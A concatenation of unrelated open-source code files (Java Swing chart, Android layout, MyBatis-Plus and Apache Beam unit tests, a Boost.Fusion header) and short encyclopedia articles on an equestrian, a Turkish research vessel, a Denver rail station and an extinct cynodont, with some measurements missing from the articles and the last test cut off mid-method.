Assert.AreEqual(recordBytes.Length - 4, data.Length);
for (int i = 0; i < data.Length; i++)
Assert.AreEqual(data[i], recordBytes[i + 4], "At offset " + i);
}
}
}
```
|
```java
/**
* Tencent is pleased to support the open source community by making APT available.
* path_to_url
*/
package com.tencent.wstt.apt.chart;
import java.awt.BorderLayout;
import java.awt.Color;
import java.awt.Font;
import java.util.List;
import javax.swing.BorderFactory;
import javax.swing.JPanel;
import org.jfree.chart.ChartFactory;
import org.jfree.chart.ChartPanel;
import org.jfree.chart.JFreeChart;
import org.jfree.chart.labels.StandardPieSectionLabelGenerator;
import org.jfree.chart.plot.PiePlot;
import org.jfree.data.general.DefaultPieDataset;
import com.tencent.wstt.apt.data.PieChartDataItem;
/**
* @Description Jpanel
* @date 20131110 5:34:28
*
*/
public class PieChart extends JPanel {
/**
*
*/
private static final long serialVersionUID = 1L;
private DefaultPieDataset dataset;
private JFreeChart chart;
public PieChart()
{
super(new BorderLayout());
chart = createChart();
final ChartPanel chartPanel = new ChartPanel(chart);
chartPanel.setBorder(BorderFactory.createCompoundBorder(
BorderFactory.createEmptyBorder(4, 4, 4, 4),
BorderFactory.createLineBorder(Color.black)));
this.add(chartPanel);
}
private JFreeChart createChart()
{
this.dataset = new DefaultPieDataset();
final JFreeChart chart = ChartFactory.createPieChart("", this.dataset,
true, true, false);
chart.getTitle().setFont(new Font("", Font.BOLD, 20));
PiePlot plot = (PiePlot) chart.getPlot();
plot.setLabelGenerator(new StandardPieSectionLabelGenerator("{0}:{1}"));
plot.setLabelFont(new Font("SansSerif", Font.PLAIN, 12));
plot.setNoDataMessage("No data available");
plot.setCircular(false);
plot.setLabelGap(0.02);
return chart;
}
/**
* dataset
* @return
*/
public void setDataset(List<PieChartDataItem> sour)
{
dataset.clear();
for(PieChartDataItem item : sour)
{
dataset.setValue(item.mapping, item.value);
}
}
}
```
|
Harriet Travers Wadsworth Harper ( – ) was an American equestrian and foxhunter.
Harriet Travers Wadsworth was born on in Newport, Rhode Island. She was the daughter of US Representative James Wolcott Wadsworth and Maria Louisa Travers, daughter of businessman William R. Travers.
She came from a family with a strong background in horse riding and fox hunting; her uncle W. Austin Wadsworth was Master of the Genesee Valley Hunt. She began riding sidesaddle at age five. She was later diagnosed with scoliosis and the doctor suggested ridding sidesaddle facing the offside (right) of the horse, opposite of the customary position. She rode in this fashion the rest of her life.
Growing up, she made frequent visits to her aunt Elizabeth Wadsworth Post in the United Kingdom. On one of those visits, she met a young Eleanor Roosevelt, a friend and classmate of her cousin Nelly Post, and recalled her as “the little American girl who was so homesick."
In 1913, Wadsworth married Fletcher Harper (1874-1963), a polo player who was the grandson of Fletcher Harper. They were engaged while Harper was in the hospital with a broken leg following "a tussle with a fractious horse". They eventually settled in Friendship Farm near The Plains, Virginia. Fletcher Harper was master of the Orange County Hunt from 1920 to 1953. The couple are credited with promoting the sport of foxhunting in the area, working with local landowners to open the land to the sport and popularizing it there among American elites.
In 1930 Harper and her husband were painted by the portrait painter Ellen Emmet Rand. Both portraits were included in Rand's 1936 New York exhibition Sporting Portraits.
In 1966, she published an autobiography, Around the World in Eighty Years on a Sidesaddle.
Harriet Travers Wadsworth Harper died on November 2, 1975, in Warrenton, Virginia.
References
Created via preloaddraft
1881 births
1975 deaths
People from Newport, Rhode Island
American female equestrians
Fox hunters
|
The RV MTA Turkuaz is a Turkish research and survey vessel owned by the General Directorate of Mineral Research and Exploration (MTA) in Ankara. Commissioned in early 2017, she will operate in deep waters under the supervision of the Geophysical Directorate for Subsea Geophysical Exploration Division.
The research vessel was ordered by Defence Industry Undersecretariate at Ministry of National Defence on April 24, 2012. She was entirely designed in SEFT Ship Design by Turkish engineers and built at Istanbul Shipyard in Tuzla, Istanbul, Turkey as the first-of-its-kind. She was launched on March 28, 2015. She will conduct a wide variety of research work including oceanography, hydrography, bathymetry, undersea geology, earthquake engineering, climate change, marine pollution, ecological research and undersea engineering in addition to geophysics for oil and gas exploration. The vessel cost around 300 million (approximately US$115 million).
It is projected that the vessel will be in use for at least 30 years.
Characteristics
The MTA Turkuaz, a great ocean-going and Arctic-fit vessel, is long, with a beam of . Assessed at and 1,500 NT, she has a speed of in service and during research work.
She will be fitted with two- and three-dimensional undersea survey equipment and a remotely operated multipurpose underwater vehicle (ROV). She provides a landing platform capable of supporting the day-and-night operation of a 12-tonne helicopter. 50 personnel including researchers will be on-board the ship, which has an autonomous endurance of 35 days.
Turkish defense electronic systems producing company ASELSAN delivers all the technical and electronic equipment needed for the navigation of the vessel and for the scientific research and survey work, such as the cruise control (navigation) system, the integrated communication system, the oceanographic research systems, the 2D/3D marine seismic survey system and the geological research systems.
See also
List of research vessels of Turkey
References
Research vessels of Turkey
2015 ships
Ships built in Istanbul
Survey ships
|
```xml
<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="path_to_url"
android:layout_width="match_parent"
android:layout_height="match_parent"
android:gravity="center"
android:orientation="horizontal"
android:paddingLeft="@dimen/theme_padding"
android:paddingRight="@dimen/theme_padding" >
<RelativeLayout
android:id="@+id/theme_animals_container"
android:layout_width="match_parent"
android:layout_height="match_parent"
android:layout_marginRight="@dimen/theme_margin"
android:layout_weight="1" >
<ImageView
android:id="@+id/theme_animals"
android:layout_width="match_parent"
android:layout_height="match_parent"
android:adjustViewBounds="true"
android:src="@drawable/animals_theme_star_0" />
</RelativeLayout>
<RelativeLayout
android:id="@+id/theme_monsters_container"
android:layout_width="match_parent"
android:layout_height="wrap_content"
android:layout_marginLeft="@dimen/theme_margin"
android:layout_weight="1" >
<ImageView
android:id="@+id/theme_monsters"
android:layout_width="match_parent"
android:layout_height="match_parent"
android:adjustViewBounds="true"
android:src="@drawable/monsters_theme_star_0" />
</RelativeLayout>
<RelativeLayout
android:id="@+id/theme_emoji_container"
android:layout_width="match_parent"
android:layout_height="wrap_content"
android:layout_marginLeft="@dimen/theme_margin"
android:layout_weight="1" >
<ImageView
android:id="@+id/theme_emoji"
android:layout_width="match_parent"
android:layout_height="match_parent"
android:adjustViewBounds="true"
android:src="@drawable/emoji_theme_star_0" />
</RelativeLayout>
</LinearLayout>
```
|
Commerce City/72nd station (sometimes stylized as Commerce City•72nd) is a station on the N Line of the Denver RTD commuter rail system in Commerce City, Colorado. It is the second station northbound from Union Station and is located at the west end of 72nd Avenue. Access to the Bennet R. Fernald Trail is provided at the southern end of the station. The station opened on September 21, 2020.
References
RTD commuter rail stations
Railway stations in the United States opened in 2020
2020 establishments in Colorado
Commerce City, Colorado
|
```java
package com.baomidou.mybatisplus.test.h2;
import com.baomidou.mybatisplus.core.conditions.query.QueryWrapper;
import com.baomidou.mybatisplus.core.metadata.IPage;
import com.baomidou.mybatisplus.core.toolkit.CollectionUtils;
import com.baomidou.mybatisplus.extension.plugins.pagination.Page;
import com.baomidou.mybatisplus.extension.toolkit.SqlRunner;
import com.baomidou.mybatisplus.test.h2.entity.H2Student;
import com.baomidou.mybatisplus.test.h2.service.IH2StudentService;
import org.junit.jupiter.api.*;
import org.junit.jupiter.api.extension.ExtendWith;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.test.annotation.DirtiesContext;
import org.springframework.test.context.ContextConfiguration;
import org.springframework.test.context.junit.jupiter.SpringExtension;
import org.springframework.transaction.annotation.Transactional;
import java.util.List;
/**
* SqlRunner
* @author nieqiurong 2018/8/25 11:05.
*/
@ExtendWith(SpringExtension.class)
@TestMethodOrder(MethodOrderer.OrderAnnotation.class)
@DirtiesContext(classMode = DirtiesContext.ClassMode.BEFORE_CLASS)
@ContextConfiguration(locations = {"classpath:h2/spring-test-h2.xml"})
class SqlRunnerTest {
@Autowired
private IH2StudentService studentService;
@Test
@Order(3)
void testSelectCount(){
long count = SqlRunner.db().selectCount("select count(1) from h2student");
Assertions.assertTrue(count > 0);
count = SqlRunner.db().selectCount("select count(1) from h2student where id > {0}",0);
Assertions.assertTrue(count > 0);
count = SqlRunner.db(H2Student.class).selectCount("select count(1) from h2student");
Assertions.assertTrue(count > 0);
count = SqlRunner.db(H2Student.class).selectCount("select count(1) from h2student where id > {0}",0);
Assertions.assertTrue(count > 0);
}
@Test
@Transactional
@Order(1)
void testInsert(){
Assertions.assertTrue(SqlRunner.db().insert("INSERT INTO h2student ( name, age ) VALUES ( {0}, {1} )","",2));
Assertions.assertTrue(SqlRunner.db(H2Student.class).insert("INSERT INTO h2student ( name, age ) VALUES ( {0}, {1} )","2",3));
}
@Test
@Order(2)
void testTransactional(){
try {
studentService.testSqlRunnerTransactional();
} catch (RuntimeException e){
List<H2Student> list = studentService.list(new QueryWrapper<H2Student>().like("name", "sqlRunnerTx"));
Assertions.assertTrue(CollectionUtils.isEmpty(list));
}
}
@Test
void testSelectPage() {
IPage page1 = SqlRunner.db().selectPage(new Page(1, 3), "select * from h2student");
Assertions.assertEquals(page1.getRecords().size(), 3);
IPage page2 = SqlRunner.db().selectPage(new Page(1, 3), "select * from h2student where id >= {0}", 0);
Assertions.assertEquals(page2.getRecords().size(), 3);
IPage page3 = SqlRunner.db().selectPage(new Page(1, 3), "select * from h2student where id = {0}", 10086);
Assertions.assertEquals(page3.getRecords().size(), 0);
}
}
```
|
Dinnebitodon is an extinct genus of advanced herbivorous cynodonts of the early Jurassic period. It has only been found in the Kayenta Formation in northeastern Arizona. It closely resembles the related genus Kayentatherium from the same formation. It is set apart by differences in the dentition, while resembling in most other respects.
Description
Dinnebitodon (meaning "Dinnebito (Wash) tooth"), was a small quadrupedal animal, with a head in length, belonging to the herbivorous Tritylodontidae family. The description of Dinnebitodon does not give details on the structure of the body other than to say it was similar to Kayentatherium.
Skull and jaw
The majority of the remains so far recovered and assigned to the genus Dinnebitodon are skull and jaw material. These show that Dinnebitodon had a skull long and unique in form. There are three incisors on each side of the upper jaw, with the second incisor being large and well developed at by . There are five postcanine teeth in the upper jaw that would have been functional when Dinnebitodon was alive, with a sixth possibly erupting later in the animal's life. The postcanine teeth resemble rounded-off squares with three rows of cusps on their occlusal surfaces. The teeth are notably different from the other two named Kayenta tritylodonts, Kayentatherium and Oligokyphus.
Habitat
The Kayenta Formation was deposited in an environment of braided rivers and dune fields, similar to northern Senegal today. Dinnebitodon was a terrestrial animal, living in the "Silty Facies" of the Kayenta Formation, which would have represented an interdunal river deposit. The teeth resemble those of modern animals that also feed on seeds and nuts, suggesting that perhaps Dinnebitodon fed on similar foods present during the early Jurassic Period. Considering it was living alongside its close relative Kayentatherium, some niche partitioning of the resources would have been necessary in order to avoid being outcompeted for a food source. This might explain why two similar looking animals have different dentition.
Fossil finds
Dinnebitodon fossils were first discovered by William Amaral (for whom the species is named) in 1978. Remains are housed at Harvard's Museum of Comparative Zoology and at the Museum of Northern Arizona.
See also
Kayenta Formation
Oligokyphus
Kayentatherium
References
Prehistoric cynodont genera
Jurassic synapsids
Mesozoic synapsids of North America
Kayenta Formation
Tritylodontids
Fossil taxa described in 1986
|
```c++
/*=============================================================================
file LICENSE_1_0.txt or copy at path_to_url
==============================================================================*/
#if !defined(FUSION_LESS_EQUAL_05052005_0432)
#define FUSION_LESS_EQUAL_05052005_0432
#include <boost/fusion/support/config.hpp>
#include <boost/fusion/sequence/intrinsic/begin.hpp>
#include <boost/fusion/sequence/intrinsic/end.hpp>
#include <boost/fusion/sequence/intrinsic/size.hpp>
#include <boost/fusion/sequence/comparison/enable_comparison.hpp>
#if defined(FUSION_DIRECT_OPERATOR_USAGE)
#include <boost/fusion/sequence/comparison/detail/less_equal.hpp>
#else
#include <boost/fusion/sequence/comparison/less.hpp>
#endif
namespace boost { namespace fusion
{
template <typename Seq1, typename Seq2>
BOOST_CONSTEXPR BOOST_FUSION_GPU_ENABLED
inline bool
less_equal(Seq1 const& a, Seq2 const& b)
{
#if defined(FUSION_DIRECT_OPERATOR_USAGE)
return detail::sequence_less_equal<Seq1 const, Seq2 const>::
call(fusion::begin(a), fusion::begin(b));
#else
return !(b < a);
#endif
}
namespace operators
{
template <typename Seq1, typename Seq2>
BOOST_CONSTEXPR BOOST_FUSION_GPU_ENABLED
inline typename
boost::enable_if<
traits::enable_comparison<Seq1, Seq2>
, bool
>::type
operator<=(Seq1 const& a, Seq2 const& b)
{
return fusion::less_equal(a, b);
}
}
using operators::operator<=;
}}
#endif
```
|
```java
/*
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
*
* path_to_url
*
* Unless required by applicable law or agreed to in writing, software
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
*/
package org.apache.beam.runners.dataflow.worker;
import static org.junit.Assert.assertArrayEquals;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertTrue;
import static org.junit.Assert.fail;
import org.apache.beam.vendor.guava.v32_1_2_jre.com.google.common.io.BaseEncoding;
import org.apache.beam.vendor.guava.v32_1_2_jre.com.google.common.primitives.Bytes;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.junit.runners.JUnit4;
/** Tests for OrderedCode. */
@RunWith(JUnit4.class)
public class OrderedCodeTest {
@Test
public void testWriteInfinity() {
OrderedCode orderedCode = new OrderedCode();
try {
orderedCode.readInfinity();
fail("Expected IllegalArgumentException.");
} catch (IllegalArgumentException e) {
// expected
}
orderedCode.writeInfinity();
assertTrue(orderedCode.readInfinity());
try {
orderedCode.readInfinity();
fail("Expected IllegalArgumentException.");
} catch (IllegalArgumentException e) {
// expected
}
}
@Test
public void testWriteBytes() {
byte[] first = {'a', 'b', 'c'};
byte[] second = {'d', 'e', 'f'};
byte[] last = {'x', 'y', 'z'};
OrderedCode orderedCode = new OrderedCode();
orderedCode.writeBytes(first);
byte[] firstEncoded = orderedCode.getEncodedBytes();
assertArrayEquals(orderedCode.readBytes(), first);
orderedCode.writeBytes(first);
orderedCode.writeBytes(second);
orderedCode.writeBytes(last);
byte[] allEncoded = orderedCode.getEncodedBytes();
assertArrayEquals(orderedCode.readBytes(), first);
assertArrayEquals(orderedCode.readBytes(), second);
assertArrayEquals(orderedCode.readBytes(), last);
orderedCode = new OrderedCode(firstEncoded);
orderedCode.writeBytes(second);
orderedCode.writeBytes(last);
assertArrayEquals(orderedCode.getEncodedBytes(), allEncoded);
assertArrayEquals(orderedCode.readBytes(), first);
assertArrayEquals(orderedCode.readBytes(), second);
assertArrayEquals(orderedCode.readBytes(), last);
orderedCode = new OrderedCode(allEncoded);
assertArrayEquals(orderedCode.readBytes(), first);
assertArrayEquals(orderedCode.readBytes(), second);
assertArrayEquals(orderedCode.readBytes(), last);
}
@Test
public void testWriteNumIncreasing() {
OrderedCode orderedCode = new OrderedCode();
orderedCode.writeNumIncreasing(0);
orderedCode.writeNumIncreasing(1);
orderedCode.writeNumIncreasing(Long.MIN_VALUE);
orderedCode.writeNumIncreasing(Long.MAX_VALUE);
assertEquals(0, orderedCode.readNumIncreasing());
assertEquals(1, orderedCode.readNumIncreasing());
assertEquals(Long.MIN_VALUE, orderedCode.readNumIncreasing());
assertEquals(Long.MAX_VALUE, orderedCode.readNumIncreasing());
}
/**
* Assert that encoding the specified long via {@link OrderedCode#writeSignedNumIncreasing(long)}
* results in the bytes represented by the specified string of hex digits. E.g.
* assertSignedNumIncreasingEncodingEquals("3fbf", -65) asserts that -65 is encoded as { (byte)
* 0x3f, (byte) 0xbf }.
*/
private static void assertSignedNumIncreasingEncodingEquals(
String expectedHexEncoding, long num) {
OrderedCode orderedCode = new OrderedCode();
orderedCode.writeSignedNumIncreasing(num);
assertEquals(
"Unexpected encoding for " + num,
expectedHexEncoding,
BaseEncoding.base16().lowerCase().encode(orderedCode.getEncodedBytes()));
}
/**
* Assert that encoding various long values via {@link OrderedCode#writeSignedNumIncreasing(long)}
* produces the expected bytes. Expected byte sequences were generated via the c++ (authoritative)
* implementation of OrderedCode::WriteSignedNumIncreasing.
*/
@Test
public void testSignedNumIncreasing_write() {
assertSignedNumIncreasingEncodingEquals("003f8000000000000000", Long.MIN_VALUE);
assertSignedNumIncreasingEncodingEquals("003f8000000000000001", Long.MIN_VALUE + 1);
assertSignedNumIncreasingEncodingEquals("077fffffff", Integer.MIN_VALUE - 1L);
assertSignedNumIncreasingEncodingEquals("0780000000", Integer.MIN_VALUE);
assertSignedNumIncreasingEncodingEquals("0780000001", Integer.MIN_VALUE + 1);
assertSignedNumIncreasingEncodingEquals("3fbf", -65);
assertSignedNumIncreasingEncodingEquals("40", -64);
assertSignedNumIncreasingEncodingEquals("41", -63);
assertSignedNumIncreasingEncodingEquals("7d", -3);
assertSignedNumIncreasingEncodingEquals("7e", -2);
assertSignedNumIncreasingEncodingEquals("7f", -1);
assertSignedNumIncreasingEncodingEquals("80", 0);
assertSignedNumIncreasingEncodingEquals("81", 1);
assertSignedNumIncreasingEncodingEquals("82", 2);
assertSignedNumIncreasingEncodingEquals("83", 3);
assertSignedNumIncreasingEncodingEquals("bf", 63);
assertSignedNumIncreasingEncodingEquals("c040", 64);
assertSignedNumIncreasingEncodingEquals("c041", 65);
assertSignedNumIncreasingEncodingEquals("f87ffffffe", Integer.MAX_VALUE - 1);
assertSignedNumIncreasingEncodingEquals("f87fffffff", Integer.MAX_VALUE);
assertSignedNumIncreasingEncodingEquals("f880000000", Integer.MAX_VALUE + 1L);
assertSignedNumIncreasingEncodingEquals("ffc07ffffffffffffffe", Long.MAX_VALUE - 1);
assertSignedNumIncreasingEncodingEquals("ffc07fffffffffffffff", Long.MAX_VALUE);
}
/**
* Convert a string of hex digits (e.g. "3fbf") to a byte[] (e.g. { (byte) 0x3f, (byte) 0xbf }).
*/
private static byte[] bytesFromHexString(String hexDigits) {
return BaseEncoding.base16().lowerCase().decode(hexDigits);
}
/**
* Assert that decoding (via {@link OrderedCode#readSignedNumIncreasing()}) the bytes represented
* by the specified string of hex digits results in the expected long value. E.g.
* assertDecodedSignedNumIncreasingEquals(-65, "3fbf") asserts that the byte array { (byte) 0x3f,
* (byte) 0xbf } is decoded as -65.
*/
private static void assertDecodedSignedNumIncreasingEquals(
long expectedNum, String encodedHexString) {
OrderedCode orderedCode = new OrderedCode(bytesFromHexString(encodedHexString));
assertEquals(
"Unexpected value when decoding 0x" + encodedHexString,
expectedNum,
orderedCode.readSignedNumIncreasing());
assertFalse(
"Unexpected encoded bytes remain after decoding 0x" + encodedHexString,
orderedCode.hasRemainingEncodedBytes());
}
/**
* Assert that decoding various sequences of bytes via {@link
* OrderedCode#readSignedNumIncreasing()} produces the expected long value. Input byte sequences
* were generated via the c++ (authoritative) implementation of
* OrderedCode::WriteSignedNumIncreasing.
*/
@Test
public void testSignedNumIncreasing_read() {
assertDecodedSignedNumIncreasingEquals(Long.MIN_VALUE, "003f8000000000000000");
assertDecodedSignedNumIncreasingEquals(Long.MIN_VALUE + 1, "003f8000000000000001");
assertDecodedSignedNumIncreasingEquals(Integer.MIN_VALUE - 1L, "077fffffff");
assertDecodedSignedNumIncreasingEquals(Integer.MIN_VALUE, "0780000000");
assertDecodedSignedNumIncreasingEquals(Integer.MIN_VALUE + 1, "0780000001");
assertDecodedSignedNumIncreasingEquals(-65, "3fbf");
assertDecodedSignedNumIncreasingEquals(-64, "40");
assertDecodedSignedNumIncreasingEquals(-63, "41");
assertDecodedSignedNumIncreasingEquals(-3, "7d");
assertDecodedSignedNumIncreasingEquals(-2, "7e");
assertDecodedSignedNumIncreasingEquals(-1, "7f");
assertDecodedSignedNumIncreasingEquals(0, "80");
assertDecodedSignedNumIncreasingEquals(1, "81");
assertDecodedSignedNumIncreasingEquals(2, "82");
assertDecodedSignedNumIncreasingEquals(3, "83");
assertDecodedSignedNumIncreasingEquals(63, "bf");
assertDecodedSignedNumIncreasingEquals(64, "c040");
assertDecodedSignedNumIncreasingEquals(65, "c041");
assertDecodedSignedNumIncreasingEquals(Integer.MAX_VALUE - 1, "f87ffffffe");
assertDecodedSignedNumIncreasingEquals(Integer.MAX_VALUE, "f87fffffff");
assertDecodedSignedNumIncreasingEquals(Integer.MAX_VALUE + 1L, "f880000000");
assertDecodedSignedNumIncreasingEquals(Long.MAX_VALUE - 1, "ffc07ffffffffffffffe");
assertDecodedSignedNumIncreasingEquals(Long.MAX_VALUE, "ffc07fffffffffffffff");
}
/**
* Assert that encoding (via {@link OrderedCode#writeSignedNumIncreasing(long)}) the specified
* long value and then decoding (via {@link OrderedCode#readSignedNumIncreasing()}) results in the
* original value.
*/
private static void assertSignedNumIncreasingWriteAndReadIsLossless(long num) {
OrderedCode orderedCode = new OrderedCode();
orderedCode.writeSignedNumIncreasing(num);
assertEquals(
"Unexpected result when decoding writeSignedNumIncreasing(" + num + ")",
num,
orderedCode.readSignedNumIncreasing());
assertFalse(
"Unexpected remaining encoded bytes after decoding " + num,
orderedCode.hasRemainingEncodedBytes());
}
/**
* Assert that for various long values, encoding (via {@link
* OrderedCode#writeSignedNumIncreasing(long)}) and then decoding (via {@link
* OrderedCode#readSignedNumIncreasing()}) results in the original value.
*/
@Test
public void testSignedNumIncreasing_writeAndRead() {
assertSignedNumIncreasingWriteAndReadIsLossless(Long.MIN_VALUE);
assertSignedNumIncreasingWriteAndReadIsLossless(Long.MIN_VALUE + 1);
assertSignedNumIncreasingWriteAndReadIsLossless(Integer.MIN_VALUE - 1L);
assertSignedNumIncreasingWriteAndReadIsLossless(Integer.MIN_VALUE);
assertSignedNumIncreasingWriteAndReadIsLossless(Integer.MIN_VALUE + 1);
assertSignedNumIncreasingWriteAndReadIsLossless(-65);
assertSignedNumIncreasingWriteAndReadIsLossless(-64);
assertSignedNumIncreasingWriteAndReadIsLossless(-63);
assertSignedNumIncreasingWriteAndReadIsLossless(-3);
assertSignedNumIncreasingWriteAndReadIsLossless(-2);
assertSignedNumIncreasingWriteAndReadIsLossless(-1);
assertSignedNumIncreasingWriteAndReadIsLossless(0);
assertSignedNumIncreasingWriteAndReadIsLossless(1);
assertSignedNumIncreasingWriteAndReadIsLossless(2);
assertSignedNumIncreasingWriteAndReadIsLossless(3);
assertSignedNumIncreasingWriteAndReadIsLossless(63);
assertSignedNumIncreasingWriteAndReadIsLossless(64);
assertSignedNumIncreasingWriteAndReadIsLossless(65);
assertSignedNumIncreasingWriteAndReadIsLossless(Integer.MAX_VALUE - 1);
assertSignedNumIncreasingWriteAndReadIsLossless(Integer.MAX_VALUE);
assertSignedNumIncreasingWriteAndReadIsLossless(Integer.MAX_VALUE + 1L);
assertSignedNumIncreasingWriteAndReadIsLossless(Long.MAX_VALUE - 1);
assertSignedNumIncreasingWriteAndReadIsLossless(Long.MAX_VALUE);
}
@Test
public void testLog2Floor_Positive() {
OrderedCode orderedCode = new OrderedCode();
assertEquals(0, orderedCode.log2Floor(1));
assertEquals(1, orderedCode.log2Floor(2));
assertEquals(1, orderedCode.log2Floor(3));
assertEquals(2, orderedCode.log2Floor(4));
assertEquals(5, orderedCode.log2Floor(63));
assertEquals(6, orderedCode.log2Floor(64));
assertEquals(62, orderedCode.log2Floor(Long.MAX_VALUE));
}
/** OrderedCode.log2Floor(long) is defined to return -1 given an input of zero. */
@Test
public void testLog2Floor_zero() {
OrderedCode orderedCode = new OrderedCode();
assertEquals(-1, orderedCode.log2Floor(0));
}
@Test
public void testLog2Floor_negative() {
OrderedCode orderedCode = new OrderedCode();
try {
orderedCode.log2Floor(-1);
fail("Expected an IllegalArgumentException.");
} catch (IllegalArgumentException expected) {
// Expected!
}
}
@Test
public void testGetSignedEncodingLength() {
OrderedCode orderedCode = new OrderedCode();
assertEquals(10, orderedCode.getSignedEncodingLength(Long.MIN_VALUE));
assertEquals(10, orderedCode.getSignedEncodingLength(~(1L << 62)));
assertEquals(9, orderedCode.getSignedEncodingLength(~(1L << 62) + 1));
assertEquals(3, orderedCode.getSignedEncodingLength(-8193));
assertEquals(2, orderedCode.getSignedEncodingLength(-8192));
assertEquals(2, orderedCode.getSignedEncodingLength(-65));
assertEquals(1, orderedCode.getSignedEncodingLength(-64));
assertEquals(1, orderedCode.getSignedEncodingLength(-2));
assertEquals(1, orderedCode.getSignedEncodingLength(-1));
assertEquals(1, orderedCode.getSignedEncodingLength(0));
assertEquals(1, orderedCode.getSignedEncodingLength(1));
assertEquals(1, orderedCode.getSignedEncodingLength(63));
assertEquals(2, orderedCode.getSignedEncodingLength(64));
assertEquals(2, orderedCode.getSignedEncodingLength(8191));
assertEquals(3, orderedCode.getSignedEncodingLength(8192));
assertEquals(9, orderedCode.getSignedEncodingLength((1L << 62)) - 1);
assertEquals(10, orderedCode.getSignedEncodingLength(1L << 62));
assertEquals(10, orderedCode.getSignedEncodingLength(Long.MAX_VALUE));
}
@Test
public void testWriteTrailingBytes() {
byte[] escapeChars =
new byte[] {
OrderedCode.ESCAPE1,
OrderedCode.NULL_CHARACTER,
OrderedCode.SEPARATOR,
OrderedCode.ESCAPE2,
OrderedCode.INFINITY,
OrderedCode.FF_CHARACTER
};
byte[] anotherArray = new byte[] {'a', 'b', 'c', 'd', 'e'};
OrderedCode orderedCode = new OrderedCode();
orderedCode.writeTrailingBytes(escapeChars);
assertArrayEquals(orderedCode.getEncodedBytes(), escapeChars);
assertArrayEquals(orderedCode.readTrailingBytes(), escapeChars);
try {
orderedCode.readInfinity();
fail("Expected IllegalArgumentException.");
} catch (IllegalArgumentException e) {
// expected
}
orderedCode = new OrderedCode();
orderedCode.writeTrailingBytes(anotherArray);
assertArrayEquals(orderedCode.getEncodedBytes(), anotherArray);
assertArrayEquals(orderedCode.readTrailingBytes(), anotherArray);
}
@Test
public void testMixedWrite() {
byte[] first = {'a', 'b', 'c'};
byte[] second = {'d', 'e', 'f'};
byte[] last = {'x', 'y', 'z'};
byte[] escapeChars =
new byte[] {
OrderedCode.ESCAPE1,
OrderedCode.NULL_CHARACTER,
OrderedCode.SEPARATOR,
OrderedCode.ESCAPE2,
OrderedCode.INFINITY,
OrderedCode.FF_CHARACTER
};
OrderedCode orderedCode = new OrderedCode();
orderedCode.writeBytes(first);
orderedCode.writeBytes(second);
orderedCode.writeBytes(last);
orderedCode.writeInfinity();
orderedCode.writeNumIncreasing(0);
orderedCode.writeNumIncreasing(1);
orderedCode.writeNumIncreasing(Long.MIN_VALUE);
orderedCode.writeNumIncreasing(Long.MAX_VALUE);
orderedCode.writeSignedNumIncreasing(0);
orderedCode.writeSignedNumIncreasing(1);
orderedCode.writeSignedNumIncreasing(Long.MIN_VALUE);
orderedCode.writeSignedNumIncreasing(Long.MAX_VALUE);
orderedCode.writeTrailingBytes(escapeChars);
byte[] allEncoded = orderedCode.getEncodedBytes();
assertArrayEquals(orderedCode.readBytes(), first);
assertArrayEquals(orderedCode.readBytes(), second);
assertFalse(orderedCode.readInfinity());
assertArrayEquals(orderedCode.readBytes(), last);
assertTrue(orderedCode.readInfinity());
assertEquals(0, orderedCode.readNumIncreasing());
assertEquals(1, orderedCode.readNumIncreasing());
assertFalse(orderedCode.readInfinity());
assertEquals(Long.MIN_VALUE, orderedCode.readNumIncreasing());
assertEquals(Long.MAX_VALUE, orderedCode.readNumIncreasing());
assertEquals(0, orderedCode.readSignedNumIncreasing());
assertEquals(1, orderedCode.readSignedNumIncreasing());
assertFalse(orderedCode.readInfinity());
assertEquals(Long.MIN_VALUE, orderedCode.readSignedNumIncreasing());
assertEquals(Long.MAX_VALUE, orderedCode.readSignedNumIncreasing());
assertArrayEquals(orderedCode.getEncodedBytes(), escapeChars);
assertArrayEquals(orderedCode.readTrailingBytes(), escapeChars);
orderedCode = new OrderedCode(allEncoded);
assertArrayEquals(orderedCode.readBytes(), first);
assertArrayEquals(orderedCode.readBytes(), second);
assertFalse(orderedCode.readInfinity());
assertArrayEquals(orderedCode.readBytes(), last);
assertTrue(orderedCode.readInfinity());
assertEquals(0, orderedCode.readNumIncreasing());
assertEquals(1, orderedCode.readNumIncreasing());
assertFalse(orderedCode.readInfinity());
assertEquals(Long.MIN_VALUE, orderedCode.readNumIncreasing());
assertEquals(Long.MAX_VALUE, orderedCode.readNumIncreasing());
assertEquals(0, orderedCode.readSignedNumIncreasing());
assertEquals(1, orderedCode.readSignedNumIncreasing());
assertFalse(orderedCode.readInfinity());
assertEquals(Long.MIN_VALUE, orderedCode.readSignedNumIncreasing());
assertEquals(Long.MAX_VALUE, orderedCode.readSignedNumIncreasing());
assertArrayEquals(orderedCode.getEncodedBytes(), escapeChars);
assertArrayEquals(orderedCode.readTrailingBytes(), escapeChars);
}
@Test
public void testEdgeCases() {
byte[] ffChar = {OrderedCode.FF_CHARACTER};
byte[] nullChar = {OrderedCode.NULL_CHARACTER};
byte[] separatorEncoded = {OrderedCode.ESCAPE1, OrderedCode.SEPARATOR};
byte[] ffCharEncoded = {OrderedCode.ESCAPE1, OrderedCode.NULL_CHARACTER};
byte[] nullCharEncoded = {OrderedCode.ESCAPE2, OrderedCode.FF_CHARACTER};
byte[] infinityEncoded = {OrderedCode.ESCAPE2, OrderedCode.INFINITY};
OrderedCode orderedCode = new OrderedCode();
orderedCode.writeBytes(ffChar);
orderedCode.writeBytes(nullChar);
orderedCode.writeInfinity();
assertArrayEquals(
orderedCode.getEncodedBytes(),
Bytes.concat(
ffCharEncoded, separatorEncoded, nullCharEncoded, separatorEncoded, infinityEncoded));
assertArrayEquals(orderedCode.readBytes(), ffChar);
assertArrayEquals(orderedCode.readBytes(), nullChar);
assertTrue(orderedCode.readInfinity());
orderedCode = new OrderedCode(Bytes.concat(ffCharEncoded, separatorEncoded));
assertArrayEquals(orderedCode.readBytes(), ffChar);
orderedCode = new OrderedCode(Bytes.concat(nullCharEncoded, separatorEncoded));
assertArrayEquals(orderedCode.readBytes(), nullChar);
byte[] invalidEncodingForRead = {
OrderedCode.ESCAPE2, OrderedCode.ESCAPE2, OrderedCode.ESCAPE1, OrderedCode.SEPARATOR
};
orderedCode = new OrderedCode(invalidEncodingForRead);
